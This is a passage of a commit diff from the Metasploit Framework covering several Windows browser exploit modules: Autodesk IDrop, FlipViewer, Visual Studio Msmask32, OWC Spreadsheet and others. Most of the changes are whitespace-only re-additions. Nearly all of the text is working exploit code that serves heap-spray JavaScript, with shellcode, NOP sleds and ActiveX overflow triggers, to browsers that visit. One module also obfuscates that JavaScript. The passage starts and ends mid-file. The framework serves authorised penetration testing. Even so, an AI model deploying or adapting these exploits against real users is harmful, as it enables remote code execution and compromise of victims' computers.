j_ret = rand_text_alpha(rand(100) + 1)
j_eax = rand_text_alpha(rand(100) + 1)
j_bof = rand_text_alpha(rand(100) + 1)
# Build out the message
content = %Q|
<html>
<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='#{ampx}'></OBJECT>
<script language='javascript'>
#{j_shellcode}=unescape('#{shellcode}');
#{j_nops}=unescape('#{nops}');
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
#{j_eax}='';
for(#{j_counter}=0;#{j_counter}<=350;#{j_counter}++)#{j_eax}+=unescape('%FF%FF%FF%FF');
#{j_ret}='';
for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
#{j_bof}=#{j_eax}+#{j_ret};
#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
</script>
</html>
|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end

262
modules/exploits/windows/browser/autodesk_idrop.rb
View File

@ -1,132 +1,132 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Autodesk IDrop ActiveX Control Heap Memory Corruption',
'Description' => %q{
This module exploits a heap-based memory corruption vulnerability in
Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160.
An attacker can execute arbitrary code by triggering a heap use after
free condition using the Src, Background, PackageXml properties.
},
'License' => MSF_LICENSE,
'Author' => [
'Elazar Broad <elazarb[at]earthlink.net>', # Original exploit [see References]
'Trancer <mtrancer[at]gmail.com>' # Metasploit implementation
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '53265' ],
[ 'BID', '34352' ],
[ 'URL', 'http://www.milw0rm.com/exploits/8560' ],
[ 'URL', 'http://marc.info/?l=full-disclosure&m=123870112214736' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 900, 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Apr 2 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape([target.ret].pack('V'))
blocksize = 0x40000
fillto = 550
offset = target['Offset']
# Randomize the javascript variable names
idrop = rand_text_alpha(rand(100) + 1)
j_function = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_mem = rand_text_alpha(rand(100) + 1)
# Build out the message
content = %Q|
<html>
<head>
<script language='javascript' defer>
function #{j_function}() {
#{j_shellcode}=unescape('#{shellcode}');
#{j_nops}=unescape('#{nops}');
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
var #{j_ret} = '';
for (#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++) {
#{j_ret} += unescape('%u0a0a');
}
for(#{j_counter}=0;#{j_counter}<20;#{j_counter}++) {
try {
var #{j_mem} = #{idrop}.Src;
#{idrop}.Src = 'http://' + #{j_ret};
#{idrop}.Src = #{j_mem};
#{idrop}.Src = 'http://' + #{j_ret};
} catch(e){}
}
}
</script>
</head>
<body onload='return #{j_function}();'>
<object classid='clsid:21E0CB95-1198-4945-A3D2-4BF804295F78' id='#{idrop}'></object>
</body>
</html>
|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Autodesk IDrop ActiveX Control Heap Memory Corruption',
'Description' => %q{
This module exploits a heap-based memory corruption vulnerability in
Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160.
An attacker can execute arbitrary code by triggering a heap use after
free condition using the Src, Background, PackageXml properties.
},
'License' => MSF_LICENSE,
'Author' => [
'Elazar Broad <elazarb[at]earthlink.net>', # Original exploit [see References]
'Trancer <mtrancer[at]gmail.com>' # Metasploit implementation
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '53265' ],
[ 'BID', '34352' ],
[ 'URL', 'http://www.milw0rm.com/exploits/8560' ],
[ 'URL', 'http://marc.info/?l=full-disclosure&m=123870112214736' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 900, 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Apr 2 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape([target.ret].pack('V'))
blocksize = 0x40000
fillto = 550
offset = target['Offset']
# Randomize the javascript variable names
idrop = rand_text_alpha(rand(100) + 1)
j_function = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_mem = rand_text_alpha(rand(100) + 1)
# Build out the message
content = %Q|
<html>
<head>
<script language='javascript' defer>
function #{j_function}() {
#{j_shellcode}=unescape('#{shellcode}');
#{j_nops}=unescape('#{nops}');
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
var #{j_ret} = '';
for (#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++) {
#{j_ret} += unescape('%u0a0a');
}
for(#{j_counter}=0;#{j_counter}<20;#{j_counter}++) {
try {
var #{j_mem} = #{idrop}.Src;
#{idrop}.Src = 'http://' + #{j_ret};
#{idrop}.Src = #{j_mem};
#{idrop}.Src = 'http://' + #{j_ret};
} catch(e){}
}
}
</script>
</head>
<body onload='return #{j_function}();'>
<object classid='clsid:21E0CB95-1198-4945-A3D2-4BF804295F78' id='#{idrop}'></object>
</body>
</html>
|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end

226
modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
View File

@ -1,115 +1,115 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'FlipViewer FViewerLoading ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in E-BOOK Systems FlipViewer 4.0.
The vulnerability is caused due to a boundary error in the
FViewerLoading (FlipViewerX.dll) ActiveX control when handling the
"LoadOpf()" method.
},
'License' => BSD_LICENSE,
'Author' => [ 'LSO <lso@hushmail.com>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-2919' ],
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'FlipViewer FViewerLoading ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in E-BOOK Systems FlipViewer 4.0.
The vulnerability is caused due to a boundary error in the
FViewerLoading (FlipViewerX.dll) ActiveX control when handling the
"LoadOpf()" method.
},
'License' => BSD_LICENSE,
'Author' => [ 'LSO <lso@hushmail.com>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-2919' ],
[ 'OSVDB', '37042' ],
[ 'BID', '24328' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
# Tested ok patrickw 20090303
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ],
],
'DisclosureDate' => 'June 6 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
return if ((p = regenerate_payload(cli)) == nil)
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
nops = Rex::Text.to_unescape(make_nops(4))
ret = Rex::Text.uri_encode([target.ret].pack('L'))
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object classid='clsid:BA83FD38-CE14-4DA3-BEF5-96050D55F78A' id='#{vname}'></object>
<script language='javascript'>
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 1324; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.LoadOpf(#{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{rand8});
</script>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, content)
handler(cli)
end
end
[ 'BID', '24328' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
# Tested ok patrickw 20090303
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ],
],
'DisclosureDate' => 'June 6 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
return if ((p = regenerate_payload(cli)) == nil)
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
nops = Rex::Text.to_unescape(make_nops(4))
ret = Rex::Text.uri_encode([target.ret].pack('L'))
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object classid='clsid:BA83FD38-CE14-4DA3-BEF5-96050D55F78A' id='#{vname}'></object>
<script language='javascript'>
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 1324; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.LoadOpf(#{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{rand8});
</script>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, content)
handler(cli)
end
end

8
modules/exploits/windows/browser/ie_createobject.rb
View File

@ -22,6 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
# In badly misconfigured situations, IE7 and 8 could be vulnerable to
# this, but by default they throw an ugly popup that stops all script
# execution until the user deals with it and aborts everything if they
# click "no". Not worth the risk of being unable to try more recent
# exploits.
:ua_maxver => "6.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => 'CreateObject',
@ -41,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
'{0006F033-0000-0000-C000-000000000046}',
'{0006F03A-0000-0000-C000-000000000046}',
],
:rank => ExcellentRanking # reliable exe writer
#:rank => ExcellentRanking # reliable exe writer
})
def initialize(info = {})

242
modules/exploits/windows/browser/ms_visual_studio_msmask.rb
View File

@ -1,122 +1,122 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow.',
'Description' => %q{
This module exploits a stack overflow in Microsoft's Visual Studio 6.0.
When passing a specially crafted string to the Mask parameter of the
Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary
code.
},
'License' => MSF_LICENSE,
'Author' => [ 'koshi', 'MC' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-3704' ],
[ 'BID','30674' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2 IE 6.0 SP0-SP2', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Aug 13 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
], self.class)
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = rand_text_alpha(rand(100) + 1)
rand11 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<script language="javascript">
var #{rand1}='<object classid="clsid:C932BA85-4374-101B-A56C-00AA003668DC"><param name="Mask" value="';
var #{rand2}='"></object>';
var #{rand3} = '';
for (#{var_i}=1;#{var_i}<=2145;#{var_i}++){#{rand3}=#{rand3}+unescape("%0c");}
var #{rand4} = unescape("#{shellcode}");
var #{rand5} = (#{rand4}.length * 2);
var #{rand6} = unescape("#{nops}");
var #{rand7} = 0x0c0c0c0c;
var #{rand8} = 0x100000;
var #{rand9} = #{rand8} - (#{rand5} + 1);
var #{rand10} = (#{rand7}+#{rand8})/#{rand8};
var #{rand11} = new Array();
while (#{rand6}.length*2<#{rand9})
{ #{rand6} += #{rand6}; }
#{rand6} = #{rand6}.substring(0,#{rand9}/2);
for (#{var_i}=0;#{var_i}<#{rand10};#{var_i}++)
{ #{rand11}[#{var_i}] = #{rand6} + #{rand4}; }
document.write(#{rand1}+#{rand3}+#{rand2});
</script>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow.',
'Description' => %q{
This module exploits a stack overflow in Microsoft's Visual Studio 6.0.
When passing a specially crafted string to the Mask parameter of the
Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary
code.
},
'License' => MSF_LICENSE,
'Author' => [ 'koshi', 'MC' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-3704' ],
[ 'BID','30674' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2 IE 6.0 SP0-SP2', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Aug 13 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
], self.class)
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = rand_text_alpha(rand(100) + 1)
rand11 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<script language="javascript">
var #{rand1}='<object classid="clsid:C932BA85-4374-101B-A56C-00AA003668DC"><param name="Mask" value="';
var #{rand2}='"></object>';
var #{rand3} = '';
for (#{var_i}=1;#{var_i}<=2145;#{var_i}++){#{rand3}=#{rand3}+unescape("%0c");}
var #{rand4} = unescape("#{shellcode}");
var #{rand5} = (#{rand4}.length * 2);
var #{rand6} = unescape("#{nops}");
var #{rand7} = 0x0c0c0c0c;
var #{rand8} = 0x100000;
var #{rand9} = #{rand8} - (#{rand5} + 1);
var #{rand10} = (#{rand7}+#{rand8})/#{rand8};
var #{rand11} = new Array();
while (#{rand6}.length*2<#{rand9})
{ #{rand6} += #{rand6}; }
#{rand6} = #{rand6}.substring(0,#{rand9}/2);
for (#{var_i}=0;#{var_i}<#{rand10};#{var_i}++)
{ #{rand11}[#{var_i}] = #{rand6} + #{rand4}; }
document.write(#{rand1}+#{rand3}+#{rand2});
</script>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end

264
modules/exploits/windows/browser/owc_spreadsheet_msdso.rb
View File

@ -1,133 +1,133 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption',
'Description' => %q{
This module exploits a memory corruption vulnerability within the Office Web Component
Spreadsheet ActiveX control. This module was based on an exploit found in
the wild.
},
'License' => MSF_LICENSE,
'Author' => ['unknown','hdm'],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-1136' ],
[ 'OSVDB', '55806'],
[ 'MSB', 'MS09-043' ],
[ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Jul 13 2009',
'DefaultTarget' => 0))
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
end
def on_request_uri(cli, request)
# Send a redirect with the javascript encoding key
#if (!request.uri.match(/\?\w+/))
# send_local_redirect(cli, "?#{@javascript_encode_key}")
# return
#end
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
shellcode = Rex::Text.to_unescape(p.encoded)
retaddr = Rex::Text.to_unescape([target.ret].pack('V'))
js = %Q|
var xshellcode = unescape("#{shellcode}");
var xarray = new Array();
var xls = 0x81000-(xshellcode.length*2);
var xbigblock = unescape("#{retaddr}");
while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
var xlh = xbigblock.substring(0, xls / 2);
delete xbigblock;
for(xi=0; xi<0x99*2; xi++) {
xarray[xi] = xlh + xlh + xshellcode;
}
CollectGarbage();
var xobj = new ActiveXObject("OWC10.Spreadsheet");
xe = new Array();
xe.push(1);
xe.push(2);
xe.push(0);
xe.push(window);
for(xi=0; xi < xe.length; xi++){
for(xj=0; xj<10; xj++){
try { xobj.Evaluate(xe[xi]); } catch(e) { }
}
}
window.status = xe[3] + '';
for(xj=0; xj<10; xj++){
try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
}
|
# Obfuscate it up a bit
js = obfuscate_js(js,
'Symbols' => {
'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj}
}
).to_s
# Encode the javascript payload with the URI key
# js = encrypt_js(js, @javascript_encode_key)
# Fire off the page to the client
send_response(cli, "<html><script language='javascript'>#{js}</script></html>")
# Handle the payload
handler(cli)
end
end
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption',
'Description' => %q{
This module exploits a memory corruption vulnerability within the Office Web Component
Spreadsheet ActiveX control. This module was based on an exploit found in
the wild.
},
'License' => MSF_LICENSE,
'Author' => ['unknown','hdm'],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-1136' ],
[ 'OSVDB', '55806'],
[ 'MSB', 'MS09-043' ],
[ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'Jul 13 2009',
'DefaultTarget' => 0))
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
end
def on_request_uri(cli, request)
# Send a redirect with the javascript encoding key
#if (!request.uri.match(/\?\w+/))
# send_local_redirect(cli, "?#{@javascript_encode_key}")
# return
#end
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
shellcode = Rex::Text.to_unescape(p.encoded)
retaddr = Rex::Text.to_unescape([target.ret].pack('V'))
js = %Q|
var xshellcode = unescape("#{shellcode}");
var xarray = new Array();
var xls = 0x81000-(xshellcode.length*2);
var xbigblock = unescape("#{retaddr}");
while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
var xlh = xbigblock.substring(0, xls / 2);
delete xbigblock;
for(xi=0; xi<0x99*2; xi++) {
xarray[xi] = xlh + xlh + xshellcode;
}
CollectGarbage();
var xobj = new ActiveXObject("OWC10.Spreadsheet");
xe = new Array();
xe.push(1);
xe.push(2);
xe.push(0);
xe.push(window);
for(xi=0; xi < xe.length; xi++){
for(xj=0; xj<10; xj++){
try { xobj.Evaluate(xe[xi]); } catch(e) { }
}
}
window.status = xe[3] + '';
for(xj=0; xj<10; xj++){
try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
}
|
# Obfuscate it up a bit
js = obfuscate_js(js,
'Symbols' => {
'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj}
}
).to_s
# Encode the javascript payload with the URI key
# js = encrypt_js(js, @javascript_encode_key)
# Fire off the page to the client
send_response(cli, "<html><script language='javascript'>#{js}</script></html>")
# Handle the payload
handler(cli)
end
end

218
modules/exploits/windows/browser/roxio_cineplayer.rb
View File

@ -1,110 +1,110 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
